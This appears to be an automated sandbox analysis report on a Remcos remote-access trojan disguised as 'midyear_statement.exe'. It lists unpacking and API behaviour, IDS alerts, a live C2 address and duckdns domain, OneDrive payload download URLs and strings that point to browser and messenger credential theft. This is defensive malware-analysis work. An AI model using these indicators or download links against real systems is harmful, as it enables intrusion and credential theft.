                      Detected unpacking (creates a PE file in dynamic memory)
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifUnpacked PE file: 24.2.wkrriuhD.pif.12330000.2.unpack
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifUnpacked PE file: 31.2.wkrriuhD.pif.24140000.2.unpack
                      Source: midyear_statement.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49700 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49703 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49719 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49725 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49728 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49734 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr
                      Source: Binary string: easinvoker.pdbH source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1291692035.0000000015C05000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_040A5878
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,24_2_00401612
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,24_2_0040128D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12339253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,24_2_12339253
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,24_2_1234C291
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,24_2_1233C34D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12339665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,24_2_12339665
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12349AF5 FindFirstFileW,FindNextFileW,FindNextFileW,24_2_12349AF5
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,24_2_1233BB30
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233783C FindFirstFileW,FindNextFileW,24_2_1233783C
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,24_2_1233880C
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1237E879 FindFirstFileExA,24_2_1237E879
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,24_2_1233BD37
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_146410F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,24_2_146410F1
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_14646580 FindFirstFileExA,24_2_14646580
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0040AE51 FindFirstFileW,FindNextFileW,27_2_0040AE51
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,28_2_00407EF8
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12337C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,24_2_12337C97

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.7:49708 -> 192.3.109.132:4445
                      Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 192.3.109.132:4445 -> 192.168.2.7:49708
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: xwww.zuckdgreb.duckdns.org
                      Uses dynamic DNS services
                      Source: unknownDNS query: name: www.zuckdgreb.duckdns.org
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040BD1D0 InternetCheckConnectionA,0_2_040BD1D0
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 13.107.139.11 13.107.139.11
                      Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,24_2_1234B380
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: wkrriuhD.pif, 0000001B.00000003.1405784796.0000000000AA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                      Source: wkrriuhD.pif, 0000001B.00000003.1405784796.0000000000AA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                      Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                      Source: wkrriuhD.pif, 0000001B.00000002.1406582942.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ccounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                      Source: wkrriuhD.pif, 0000001B.00000002.1406582942.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ccounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                      Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                      Source: wkrriuhD.pifString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                      Source: wkrriuhD.pif, 00000018.00000002.3665263923.0000000014530000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                      Source: wkrriuhD.pif, 00000018.00000002.3665263923.0000000014530000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: onedrive.live.com
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: wkrriuhD.pif, 00000018.00000003.1379033633.00000000124CA000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1379159545.00000000124D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                      Source: wkrriuhD.pif, 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, wkrriuhD.pif, 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: wkrriuhD.pif, 00000018.00000003.1379033633.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1382491430.0000000012491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                      Source: wkrriuhD.pif, 00000018.00000003.1379033633.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1382491430.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1405851694.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1622995189.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://ocsp.digicert.com0:
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://ocsp.digicert.com0H
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://ocsp.digicert.com0I
